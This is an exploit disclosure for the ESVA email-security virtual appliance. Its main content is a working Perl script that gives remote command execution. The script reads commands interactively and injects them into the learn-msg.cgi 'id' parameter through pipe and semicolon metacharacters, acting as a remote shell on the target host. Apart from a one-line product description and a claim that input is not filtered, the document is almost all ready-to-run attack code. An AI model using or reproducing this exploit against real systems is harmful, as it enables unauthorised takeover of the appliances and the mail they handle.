ESVA (E-Mail Security Virtual Appliance) is a pre-built and semi-configured email scanning appliance that will run on VMware Workstation, Server, Player or ESX Server.
-=+ Infected Files
Not found any strips/filter to metacharacters..
Attacker can easily execute command..
-=+ Simple RCE ESVA
#! /usr/bin/perl use LWP; use HTTP::Request; if (@ARGV < 1) { print "\n==========================================\n"; print " ESVA - REMOTE EXECUTION SCRIPT \n"; print "==========================================\n"; print "Usage: perl victimz (without http://)\n"; print "Ex. perl\n"; exit; } $host=$ARGV[0]; print "Try to Execution Command!\n"; print "iDSc-shell# "; chomp( $cmd = <STDIN>); while($cmd !~ "exit") { $content = ""; $ua = LWP::UserAgent->new(); $ua->agent(''); $request = HTTP::Request->new (GET => "http://".$host."/cgi-bin/learn-msg.cgi?id=%7c".$cmd."%3b"); $response = $ua->request ($request); $content = $response->content; print $content."\n"; print "iDSc-shell# "; chomp( $cmd = <STDIN>); }